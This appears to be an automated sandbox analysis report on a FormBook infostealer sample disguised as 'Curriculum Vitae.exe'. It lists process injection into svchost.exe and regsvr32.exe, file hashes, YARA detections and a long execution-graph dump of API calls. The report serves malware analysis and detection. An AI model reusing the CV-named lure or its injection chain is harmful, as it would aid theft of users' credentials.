                    Data Ascii: QpGDsvFp=7npDvcPywunCIChBav4ORMvBANy8ira5hFnLo/g2q7s8JIx7sLmwx+oeRU2xfdVb6dN9Pnpe2G9TZZOKw3bhNi4Og/QJuFKpK3qzXrGSaxn7j/Bj1aAEMswQZkDG3KkGpUzZ3siAGQxj+SVarUjVWJMWJ/OGBNhFrh+m4beIuCxapSNw3nOSA8cQhRLcO/gCDsErEGO6h2YHyjd/zsZEo41MXqSpGZi7clfadIPQbMi6BQ0oRPoL/+n7Dzy8J3YrgQ2SlBJQ9hvzUqcHscBb8BS+3SIE1p/LkQTw8D5/GxOI57X6Nh8CzQeVhvUbLhdwtYrZ7c6FLgyqMmVqMjpfNtsC55A9p9cddYm1FncHXLkaaTSqd+XnnK1x3kcIV2Sl4fndE4tgVP2F7HluYo+iBORqmhacsFiUAla0ReZEGtcwmjZ4x0kX7FOKPZuJgglbHIsWBJCOXaP8z6kI9qAEtH+pfKPfFJOcFiucfLdaVgcZPh0GsGQvED3HueXe7s2vwg1J1ezAEaPMwq4yVOxJNRdHwoVCCyIGGjTwwVRVCX+cLW5PWg82gBC1PTcsLgI7Cy1YymfgBMjOqC3R9y93Kqdaps73jx6TzsMVU02DDFTgKLk7kkBB8waY9NaX5qWRUu+rJydt2HWPnvKlXh7W9wOt74T3a27abHcderzOOV6srq8fuDCRloSzq0RhU26ThkS/aKSqJOnw/OoCPF4CJ+wQLF8Gxait739BKzUeOA09o16edQ5zn2vNESM7dj/EQBq7qsdXBBQvO+9BzhjsdX4rp6ZsgxrSdRVLBlxQv+WyCqjGO0gVh6st44GaMl22+BH0oNmB5IviEWdmi9saeY6jsUXEfgndDqZkUptYfztixEBRNq+GkvqwG9EoktbHYq7y71aj+EyMKwJrcpsDet4KrrmjIAf2nhI4kIU/JLxd/GJbbWfQ0RF1u9CXk0HiHuhdDe1VgpLgfhra/EreVQ6uXpSw2pRZWOZed3jLZZ2 [TRUNCATED]


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:0
                    Start time:06:14:21
                    Start date:29/08/2024
                    Path:C:\Users\user\Desktop\Curriculum Vitae.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\Curriculum Vitae.exe"
                    Imagebase:0xd30000
                    File size:1'268'224 bytes
                    MD5 hash:EDA3B2C20013E6A58D10AD852D39FD29
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:2
                    Start time:06:14:29
                    Start date:29/08/2024
                    Path:C:\Windows\SysWOW64\svchost.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\Curriculum Vitae.exe"
                    Imagebase:0x810000
                    File size:46'504 bytes
                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2666088394.0000000002920000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2666088394.0000000002920000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2666668441.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2666668441.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2665951843.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2665951843.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:5
                    Start time:06:15:16
                    Start date:29/08/2024
                    Path:C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe"
                    Imagebase:0xe90000
                    File size:140'800 bytes
                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3270554488.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3270554488.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                    Reputation:high
                    Has exited:false

                    General

                    Target ID:6
                    Start time:06:15:19
                    Start date:29/08/2024
                    Path:C:\Windows\SysWOW64\regsvr32.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\SysWOW64\regsvr32.exe"
                    Imagebase:0x560000
                    File size:20'992 bytes
                    MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3269294970.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3269294970.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3269532701.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3269532701.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3270513157.0000000003000000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3270513157.0000000003000000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    Reputation:high
                    Has exited:false

                    General

                    Target ID:7
                    Start time:06:15:32
                    Start date:29/08/2024
                    Path:C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe"
                    Imagebase:0xe90000
                    File size:140'800 bytes
                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3272150093.00000000051D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3272150093.00000000051D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                    Reputation:high
                    Has exited:false

                    General

                    Target ID:8
                    Start time:06:15:44
                    Start date:29/08/2024
                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                    Imagebase:0x7ff79f9e0000
                    File size:676'768 bytes
                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Disassembly

                    Reset < >

                      Execution Graph

                      Execution Coverage:3.5%
                      Dynamic/Decrypted Code Coverage:0.4%
                      Signature Coverage:5%
                      Total number of Nodes:2000
                      Total number of Limit Nodes:69
                      execution_graph 96236 d31033 96241 d34c91 96236->96241 96240 d31042 96249 d3a961 96241->96249 96246 d34d9c 96247 d31038 96246->96247 96257 d351f7 22 API calls __fread_nolock 96246->96257 96248 d500a3 29 API calls __onexit 96247->96248 96248->96240 96258 d4fe0b 96249->96258 96251 d3a976 96268 d4fddb 96251->96268 96253 d34cff 96254 d33af0 96253->96254 96293 d33b1c 96254->96293 96257->96246 96260 d4fddb 96258->96260 96261 d4fdfa 96260->96261 96263 d4fdfc 96260->96263 96278 d5ea0c 96260->96278 96285 d54ead 7 API calls 2 library calls 96260->96285 96261->96251 96264 d5066d 96263->96264 96286 d532a4 RaiseException 96263->96286 96287 d532a4 RaiseException 96264->96287 96267 d5068a 96267->96251 96270 d4fde0 96268->96270 96269 d5ea0c ___std_exception_copy 21 API calls 96269->96270 96270->96269 96271 d4fdfa 96270->96271 96274 d4fdfc 96270->96274 96290 d54ead 7 API calls 2 library calls 96270->96290 96271->96253 96273 d5066d 96292 d532a4 RaiseException 96273->96292 96274->96273 96291 d532a4 RaiseException 96274->96291 96277 d5068a 96277->96253 96283 d63820 pre_c_initialization 96278->96283 96279 d6385e 96289 d5f2d9 20 API calls _abort 96279->96289 96280 d63849 RtlAllocateHeap 96282 d6385c 96280->96282 96280->96283 96282->96260 96283->96279 96283->96280 96288 d54ead 7 API calls 2 library calls 96283->96288 96285->96260 96286->96264 96287->96267 96288->96283 96289->96282 96290->96270 96291->96273 96292->96277 96294 d33b0f 96293->96294 96295 d33b29 96293->96295 96294->96246 96295->96294 96296 d33b30 RegOpenKeyExW 96295->96296 96296->96294 96297 d33b4a RegQueryValueExW 96296->96297 96298 d33b80 RegCloseKey 96297->96298 96299 d33b6b 96297->96299 96298->96294 96299->96298 96300 d3df10 96303 d3b710 96300->96303 96304 d3b72b 96303->96304 96305 d800f8 96304->96305 96306 d80146 96304->96306 96324 d3b750 96304->96324 96309 d80102 96305->96309 96312 d8010f 96305->96312 96305->96324 96369 db58a2 236 API calls 2 library calls 96306->96369 96367 db5d33 236 API calls 96309->96367 96330 d3ba20 96312->96330 96368 db61d0 236 API calls 2 library calls 96312->96368 96315 d803d9 96315->96315 96318 d3ba4e 96320 d80322 96385 db5c0c 82 API calls 96320->96385 96324->96318 96324->96320 96328 d4d336 40 API calls 96324->96328 96329 d3bbe0 40 API calls 96324->96329 96324->96330 96334 d3ec40 96324->96334 96358 d3a81b 41 API calls 96324->96358 96359 d4d2f0 40 API calls 96324->96359 96360 d4a01b 236 API calls 96324->96360 96361 d50242 5 API calls __Init_thread_wait 96324->96361 96362 d4edcd 22 API calls 96324->96362 96363 d500a3 29 API calls __onexit 96324->96363 96364 d501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96324->96364 96365 d4ee53 82 API calls 96324->96365 96366 d4e5ca 236 API calls 96324->96366 96370 d3aceb 96324->96370 96380 d8f6bf 23 API calls 96324->96380 96381 d3a8c7 96324->96381 96328->96324 96329->96324 96330->96318 96386 da359c 82 API calls __wsopen_s 96330->96386 96353 d3ec76 ISource 96334->96353 96335 d50242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96335->96353 96336 d4fddb 22 API calls 96336->96353 96337 d3fef7 96343 d3a8c7 22 API calls 96337->96343 96350 d3ed9d ISource 96337->96350 96340 d84b0b 96390 da359c 82 API calls __wsopen_s 96340->96390 96341 d84600 96347 d3a8c7 22 API calls 96341->96347 96341->96350 96343->96350 96346 d3a8c7 22 API calls 96346->96353 96347->96350 96348 d3fbe3 96348->96350 96352 d84bdc 96348->96352 96357 d3f3ae ISource 96348->96357 96349 d3a961 22 API calls 96349->96353 96350->96324 96351 d500a3 29 API calls pre_c_initialization 96351->96353 96391 da359c 82 API calls __wsopen_s 96352->96391 96353->96335 96353->96336 96353->96337 96353->96340 96353->96341 96353->96346 96353->96348 96353->96349 96353->96350 96353->96351 96355 d84beb 96353->96355 96356 d501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96353->96356 96353->96357 96387 d401e0 236 API calls 2 library calls 96353->96387 96388 d406a0 41 API calls ISource 96353->96388 96392 da359c 82 API calls __wsopen_s 96355->96392 96356->96353 96357->96350 96389 da359c 82 API calls __wsopen_s 96357->96389 96358->96324 96359->96324 96360->96324 96361->96324 96362->96324 96363->96324 96364->96324 96365->96324 96366->96324 96367->96312 96368->96330 96369->96324 96371 d3acf9 96370->96371 96379 d3ad2a ISource 96370->96379 96372 d3ad55 96371->96372 96374 d3ad01 ISource 96371->96374 96373 d3a8c7 22 API calls 96372->96373 96372->96379 96373->96379 96375 d3ad21 96374->96375 96376 d7fa48 96374->96376 96374->96379 96378 d7fa3a VariantClear 96375->96378 96375->96379 96376->96379 96393 d4ce17 22 API calls ISource 96376->96393 96378->96379 96379->96324 96380->96324 96382 d3a8ea __fread_nolock 96381->96382 96383 d3a8db 96381->96383 96382->96324 96383->96382 96384 d4fe0b 22 API calls 96383->96384 96384->96382 96385->96330 96386->96315 96387->96353 96388->96353 96389->96350 96390->96350 96391->96355 96392->96350 96393->96379 96394 d32e37 96395 d3a961 22 API calls 96394->96395 96396 d32e4d 96395->96396 96473 d34ae3 96396->96473 96398 d32e6b 96487 d33a5a 96398->96487 96400 d32e7f 96494 d39cb3 96400->96494 96405 d72cb0 96547 da2cf9 96405->96547 96406 d32ead 96409 d3a8c7 22 API calls 96406->96409 96408 d72cc3 96410 d72ccf 96408->96410 96573 d34f39 96408->96573 96411 d32ec3 96409->96411 96414 d34f39 68 API calls 96410->96414 96522 d36f88 22 API calls 96411->96522 96416 d72ce5 96414->96416 96415 d32ecf 96417 d39cb3 22 API calls 96415->96417 96579 d33084 22 API calls 96416->96579 96418 d32edc 96417->96418 96523 d3a81b 41 API calls 96418->96523 96421 d32eec 96423 d39cb3 22 API calls 96421->96423 96422 d72d02 96580 d33084 22 API calls 96422->96580 96425 d32f12 96423->96425 96524 d3a81b 41 API calls 96425->96524 96426 d72d1e 96428 d33a5a 24 API calls 96426->96428 96430 d72d44 96428->96430 96429 d32f21 96433 d3a961 22 API calls 96429->96433 96581 d33084 22 API calls 96430->96581 96432 d72d50 96434 d3a8c7 22 API calls 96432->96434 96435 d32f3f 96433->96435 96436 d72d5e 96434->96436 96525 d33084 22 API calls 96435->96525 96582 d33084 22 API calls 96436->96582 96439 d32f4b 96526 d54a28 40 API calls 3 library calls 96439->96526 96440 d72d6d 96444 d3a8c7 22 API calls 96440->96444 96442 d32f59 96442->96416 96443 d32f63 96442->96443 96527 d54a28 40 API calls 3 library calls 96443->96527 96446 d72d83 96444->96446 96583 d33084 22 API calls 96446->96583 96447 d32f6e 96447->96422 96449 d32f78 96447->96449 96528 d54a28 40 API calls 3 library calls 96449->96528 96450 d72d90 96452 d32f83 96452->96426 96453 d32f8d 96452->96453 96529 d54a28 40 API calls 3 library calls 96453->96529 96455 d32f98 96456 d32fdc 96455->96456 96530 d33084 22 API calls 96455->96530 96456->96440 96457 d32fe8 96456->96457 96457->96450 96532 d363eb 96457->96532 96459 d32fbf 96462 d3a8c7 22 API calls 96459->96462 96464 d32fcd 96462->96464 96531 d33084 22 API calls 96464->96531 96468 d33021 96470 d33065 96468->96470 96544 d36f88 22 API calls 96468->96544 96545 d370b0 23 API calls 96468->96545 96546 d33084 22 API calls 96468->96546 96474 d34af0 __wsopen_s 96473->96474 96476 d34b22 96474->96476 96587 d36b57 96474->96587 96486 d34b58 96476->96486 96584 d34c6d 96476->96584 96478 d39cb3 22 API calls 96480 d34c52 96478->96480 96479 d39cb3 22 API calls 96479->96486 96482 d3515f 22 API calls 96480->96482 96481 d34c6d 22 API calls 96481->96486 96484 d34c5e 96482->96484 96484->96398 96485 d34c29 96485->96478 96485->96484 96486->96479 96486->96481 96486->96485 96599 d3515f 96486->96599 96616 d71f50 96487->96616 96490 d39cb3 22 API calls 96491 d33a8d 96490->96491 96618 d33aa2 96491->96618 96493 d33a97 96493->96400 96495 d39cc2 _wcslen 96494->96495 96496 d4fe0b 22 API calls 96495->96496 96497 d39cea __fread_nolock 96496->96497 96498 d4fddb 22 API calls 96497->96498 96499 d32e8c 96498->96499 96500 d34ecb 96499->96500 96638 d34e90 LoadLibraryA 96500->96638 96505 d34ef6 LoadLibraryExW 96646 d34e59 LoadLibraryA 96505->96646 96506 d73ccf 96508 d34f39 68 API calls 96506->96508 96510 d73cd6 96508->96510 96512 d34e59 3 API calls 96510->96512 96514 d73cde 96512->96514 96513 d34f20 96513->96514 96515 d34f2c 96513->96515 96668 d350f5 96514->96668 96517 d34f39 68 API calls 96515->96517 96519 d32ea5 96517->96519 96519->96405 96519->96406 96521 d73d05 96522->96415 96523->96421 96524->96429 96525->96439 96526->96442 96527->96447 96528->96452 96529->96455 96530->96459 96531->96456 96533 d363f3 96532->96533 96534 d4fddb 22 API calls 96533->96534 96535 d36401 96534->96535 96939 d36a26 96535->96939 96538 d36a50 96942 d3b010 96538->96942 96540 d36a60 96541 d4fe0b 22 API calls 96540->96541 96542 d33006 96540->96542 96541->96542 96543 d370b0 23 API calls 96542->96543 96543->96468 96544->96468 96545->96468 96546->96468 96548 da2d15 96547->96548 96549 d3511f 64 API calls 96548->96549 96550 da2d29 96549->96550 96951 da2e66 96550->96951 96553 da2d3f 96553->96408 96554 d350f5 40 API calls 96555 da2d56 96554->96555 96556 d350f5 40 API calls 96555->96556 96557 da2d66 96556->96557 96558 d350f5 40 API calls 96557->96558 96559 da2d81 96558->96559 96560 d350f5 40 API calls 96559->96560 96561 da2d9c 96560->96561 96562 d3511f 64 API calls 96561->96562 96563 da2db3 96562->96563 96564 d5ea0c ___std_exception_copy 21 API calls 96563->96564 96565 da2dba 96564->96565 96566 d5ea0c ___std_exception_copy 21 API calls 96565->96566 96567 da2dc4 96566->96567 96568 d350f5 40 API calls 96567->96568 96569 da2dd8 96568->96569 96570 da28fe 27 API calls 96569->96570 96571 da2dee 96570->96571 96571->96553 96957 da22ce 96571->96957 96574 d34f43 96573->96574 96575 d34f4a 96573->96575 96576 d5e678 67 API calls 96574->96576 96577 d34f6a FreeLibrary 96575->96577 96578 d34f59 96575->96578 96576->96575 96577->96578 96578->96410 96579->96422 96580->96426 96581->96432 96582->96440 96583->96450 96605 d3aec9 96584->96605 96586 d34c78 96586->96476 96588 d36b67 _wcslen 96587->96588 96589 d74ba1 96587->96589 96592 d36ba2 96588->96592 96593 d36b7d 96588->96593 96612 d393b2 96589->96612 96591 d74baa 96591->96591 96595 d4fddb 22 API calls 96592->96595 96611 d36f34 22 API calls 96593->96611 96596 d36bae 96595->96596 96597 d4fe0b 22 API calls 96596->96597 96598 d36b85 __fread_nolock 96597->96598 96598->96476 96600 d3516e 96599->96600 96604 d3518f __fread_nolock 96599->96604 96602 d4fe0b 22 API calls 96600->96602 96601 d4fddb 22 API calls 96603 d351a2 96601->96603 96602->96604 96603->96486 96604->96601 96606 d3aed9 __fread_nolock 96605->96606 96607 d3aedc 96605->96607 96606->96586 96608 d4fddb 22 API calls 96607->96608 96609 d3aee7 96608->96609 96610 d4fe0b 22 API calls 96609->96610 96610->96606 96611->96598 96613 d393c9 __fread_nolock 96612->96613 96614 d393c0 96612->96614 96613->96591 96613->96613 96614->96613 96615 d3aec9 22 API calls 96614->96615 96615->96613 96617 d33a67 GetModuleFileNameW 96616->96617 96617->96490 96619 d71f50 __wsopen_s 96618->96619 96620 d33aaf GetFullPathNameW 96619->96620 96621 d33ae9 96620->96621 96622 d33ace 96620->96622 96632 d3a6c3 96621->96632 96624 d36b57 22 API calls 96622->96624 96625 d33ada 96624->96625 96628 d337a0 96625->96628 96629 d337ae 96628->96629 96630 d393b2 22 API calls 96629->96630 96631 d337c2 96630->96631 96631->96493 96633 d3a6dd 96632->96633 96637 d3a6d0 96632->96637 96634 d4fddb 22 API calls 96633->96634 96635 d3a6e7 96634->96635 96636 d4fe0b 22 API calls 96635->96636 96636->96637 96637->96625 96639 d34ec6 96638->96639 96640 d34ea8 GetProcAddress 96638->96640 96643 d5e5eb 96639->96643 96641 d34eb8 96640->96641 96641->96639 96642 d34ebf FreeLibrary 96641->96642 96642->96639 96676 d5e52a 96643->96676 96645 d34eea 96645->96505 96645->96506 96647 d34e6e GetProcAddress 96646->96647 96648 d34e8d 96646->96648 96649 d34e7e 96647->96649 96651 d34f80 96648->96651 96649->96648 96650 d34e86 FreeLibrary 96649->96650 96650->96648 96652 d4fe0b 22 API calls 96651->96652 96653 d34f95 96652->96653 96744 d35722 96653->96744 96655 d34fa1 __fread_nolock 96656 d350a5 96655->96656 96657 d73d1d 96655->96657 96667 d34fdc 96655->96667 96747 d342a2 CreateStreamOnHGlobal 96656->96747 96758 da304d 74 API calls 96657->96758 96660 d73d22 96662 d3511f 64 API calls 96660->96662 96661 d350f5 40 API calls 96661->96667 96663 d73d45 96662->96663 96664 d350f5 40 API calls 96663->96664 96666 d3506e ISource 96664->96666 96666->96513 96667->96660 96667->96661 96667->96666 96753 d3511f 96667->96753 96669 d35107 96668->96669 96670 d73d70 96668->96670 96780 d5e8c4 96669->96780 96673 da28fe 96922 da274e 96673->96922 96675 da2919 96675->96521 96679 d5e536 BuildCatchObjectHelperInternal 96676->96679 96677 d5e544 96701 d5f2d9 20 API calls _abort 96677->96701 96679->96677 96681 d5e574 96679->96681 96680 d5e549 96702 d627ec 26 API calls __wsopen_s 96680->96702 96683 d5e586 96681->96683 96684 d5e579 96681->96684 96693 d68061 96683->96693 96703 d5f2d9 20 API calls _abort 96684->96703 96687 d5e58f 96688 d5e595 96687->96688 96689 d5e5a2 96687->96689 96704 d5f2d9 20 API calls _abort 96688->96704 96705 d5e5d4 LeaveCriticalSection __fread_nolock 96689->96705 96691 d5e554 __wsopen_s 96691->96645 96694 d6806d BuildCatchObjectHelperInternal 96693->96694 96706 d62f5e EnterCriticalSection 96694->96706 96696 d6807b 96707 d680fb 96696->96707 96700 d680ac __wsopen_s 96700->96687 96701->96680 96702->96691 96703->96691 96704->96691 96705->96691 96706->96696 96716 d6811e 96707->96716 96708 d68088 96720 d680b7 96708->96720 96709 d68177 96725 d64c7d 96709->96725 96714 d68189 96714->96708 96738 d63405 11 API calls 2 library calls 96714->96738 96716->96708 96716->96709 96723 d5918d EnterCriticalSection 96716->96723 96724 d591a1 LeaveCriticalSection 96716->96724 96717 d681a8 96739 d5918d EnterCriticalSection 96717->96739 96743 d62fa6 LeaveCriticalSection 96720->96743 96722 d680be 96722->96700 96723->96716 96724->96716 96730 d64c8a pre_c_initialization 96725->96730 96726 d64cca 96741 d5f2d9 20 API calls _abort 96726->96741 96727 d64cb5 RtlAllocateHeap 96728 d64cc8 96727->96728 96727->96730 96732 d629c8 96728->96732 96730->96726 96730->96727 96740 d54ead 7 API calls 2 library calls 96730->96740 96733 d629d3 RtlFreeHeap 96732->96733 96734 d629fc _free 96732->96734 96733->96734 96735 d629e8 96733->96735 96734->96714 96742 d5f2d9 20 API calls _abort 96735->96742 96737 d629ee GetLastError 96737->96734 96738->96717 96739->96708 96740->96730 96741->96728 96742->96737 96743->96722 96745 d4fddb 22 API calls 96744->96745 96746 d35734 96745->96746 96746->96655 96748 d342d9 96747->96748 96749 d342bc FindResourceExW 96747->96749 96748->96667 96749->96748 96750 d735ba LoadResource 96749->96750 96750->96748 96751 d735cf SizeofResource 96750->96751 96751->96748 96752 d735e3 LockResource 96751->96752 96752->96748 96754 d73d90 96753->96754 96755 d3512e 96753->96755 96759 d5ece3 96755->96759 96758->96660 96762 d5eaaa 96759->96762 96761 d3513c 96761->96667 96765 d5eab6 BuildCatchObjectHelperInternal 96762->96765 96763 d5eac2 96775 d5f2d9 20 API calls _abort 96763->96775 96765->96763 96766 d5eae8 96765->96766 96777 d5918d EnterCriticalSection 96766->96777 96767 d5eac7 96776 d627ec 26 API calls __wsopen_s 96767->96776 96770 d5eaf4 96778 d5ec0a 62 API calls 2 library calls 96770->96778 96772 d5eb08 96779 d5eb27 LeaveCriticalSection __fread_nolock 96772->96779 96774 d5ead2 __wsopen_s 96774->96761 96775->96767 96776->96774 96777->96770 96778->96772 96779->96774 96783 d5e8e1 96780->96783 96782 d35118 96782->96673 96784 d5e8ed BuildCatchObjectHelperInternal 96783->96784 96785 d5e925 __wsopen_s 96784->96785 96786 d5e900 ___scrt_fastfail 96784->96786 96787 d5e92d 96784->96787 96785->96782 96810 d5f2d9 20 API calls _abort 96786->96810 96796 d5918d EnterCriticalSection 96787->96796 96789 d5e937 96797 d5e6f8 96789->96797 96792 d5e91a 96811 d627ec 26 API calls __wsopen_s 96792->96811 96796->96789 96800 d5e70a ___scrt_fastfail 96797->96800 96803 d5e727 96797->96803 96798 d5e717 96885 d5f2d9 20 API calls _abort 96798->96885 96800->96798 96800->96803 96808 d5e76a __fread_nolock 96800->96808 96801 d5e71c 96886 d627ec 26 API calls __wsopen_s 96801->96886 96812 d5e96c LeaveCriticalSection __fread_nolock 96803->96812 96804 d5e886 ___scrt_fastfail 96888 d5f2d9 20 API calls _abort 96804->96888 96808->96803 96808->96804 96813 d5d955 96808->96813 96820 d68d45 96808->96820 96887 d5cf78 26 API calls 4 library calls 96808->96887 96810->96792 96811->96785 96812->96785 96814 d5d976 96813->96814 96815 d5d961 96813->96815 96814->96808 96889 d5f2d9 20 API calls _abort 96815->96889 96817 d5d966 96890 d627ec 26 API calls __wsopen_s 96817->96890 96819 d5d971 96819->96808 96821 d68d57 96820->96821 96822 d68d6f 96820->96822 96900 d5f2c6 20 API calls _abort 96821->96900 96824 d690d9 96822->96824 96829 d68db4 96822->96829 96916 d5f2c6 20 API calls _abort 96824->96916 96825 d68d5c 96901 d5f2d9 20 API calls _abort 96825->96901 96828 d690de 96917 d5f2d9 20 API calls _abort 96828->96917 96830 d68d64 96829->96830 96832 d68dbf 96829->96832 96836 d68def 96829->96836 96830->96808 96902 d5f2c6 20 API calls _abort 96832->96902 96833 d68dcc 96918 d627ec 26 API calls __wsopen_s 96833->96918 96835 d68dc4 96903 d5f2d9 20 API calls _abort 96835->96903 96839 d68e08 96836->96839 96840 d68e2e 96836->96840 96841 d68e4a 96836->96841 96839->96840 96875 d68e15 96839->96875 96904 d5f2c6 20 API calls _abort 96840->96904 96907 d63820 21 API calls 2 library calls 96841->96907 96843 d68e33 96905 d5f2d9 20 API calls _abort 96843->96905 96845 d68e61 96848 d629c8 _free 20 API calls 96845->96848 96851 d68e6a 96848->96851 96849 d68e3a 96906 d627ec 26 API calls __wsopen_s 96849->96906 96850 d68fb3 96853 d69029 96850->96853 96856 d68fcc GetConsoleMode 96850->96856 96854 d629c8 _free 20 API calls 96851->96854 96855 d6902d ReadFile 96853->96855 96857 d68e71 96854->96857 96858 d69047 96855->96858 96859 d690a1 GetLastError 96855->96859 96856->96853 96860 d68fdd 96856->96860 96861 d68e96 96857->96861 96862 d68e7b 96857->96862 96858->96859 96865 d6901e 96858->96865 96863 d69005 96859->96863 96864 d690ae 96859->96864 96860->96855 96866 d68fe3 ReadConsoleW 96860->96866 96910 d69424 28 API calls __fread_nolock 96861->96910 96908 d5f2d9 20 API calls _abort 96862->96908 96883 d68e45 __fread_nolock 96863->96883 96911 d5f2a3 20 API calls 2 library calls 96863->96911 96914 d5f2d9 20 API calls _abort 96864->96914 96878 d69083 96865->96878 96879 d6906c 96865->96879 96865->96883 96866->96865 96871 d68fff GetLastError 96866->96871 96867 d629c8 _free 20 API calls 96867->96830 96871->96863 96873 d68e80 96909 d5f2c6 20 API calls _abort 96873->96909 96874 d690b3 96915 d5f2c6 20 API calls _abort 96874->96915 96891 d6f89b 96875->96891 96880 d6909a 96878->96880 96878->96883 96912 d68a61 31 API calls 3 library calls 96879->96912 96913 d688a1 29 API calls __fread_nolock 96880->96913 96883->96867 96884 d6909f 96884->96883 96885->96801 96886->96803 96887->96808 96888->96801 96889->96817 96890->96819 96892 d6f8b5 96891->96892 96893 d6f8a8 96891->96893 96896 d6f8c1 96892->96896 96920 d5f2d9 20 API calls _abort 96892->96920 96919 d5f2d9 20 API calls _abort 96893->96919 96895 d6f8ad 96895->96850 96896->96850 96898 d6f8e2 96921 d627ec 26 API calls __wsopen_s 96898->96921 96900->96825 96901->96830 96902->96835 96903->96833 96904->96843 96905->96849 96906->96883 96907->96845 96908->96873 96909->96883 96910->96875 96911->96883 96912->96883 96913->96884 96914->96874 96915->96883 96916->96828 96917->96833 96918->96830 96919->96895 96920->96898 96921->96895 96925 d5e4e8 96922->96925 96924 da275d 96924->96675 96928 d5e469 96925->96928 96927 d5e505 96927->96924 96929 d5e48c 96928->96929 96930 d5e478 96928->96930 96935 d5e488 __alldvrm 96929->96935 96938 d6333f 11 API calls 2 library calls 96929->96938 96936 d5f2d9 20 API calls _abort 96930->96936 96933 d5e47d 96937 d627ec 26 API calls __wsopen_s 96933->96937 96935->96927 96936->96933 96937->96935 96938->96935 96940 d4fddb 22 API calls 96939->96940 96941 d32ff8 96940->96941 96941->96538 96943 d3b01b 96942->96943 96944 d7fb4d 96943->96944 96948 d3b023 ISource 96943->96948 96945 d4fddb 22 API calls 96944->96945 96947 d7fb59 96945->96947 96946 d3b02a 96946->96540 96948->96946 96950 d3b090 22 API calls ISource 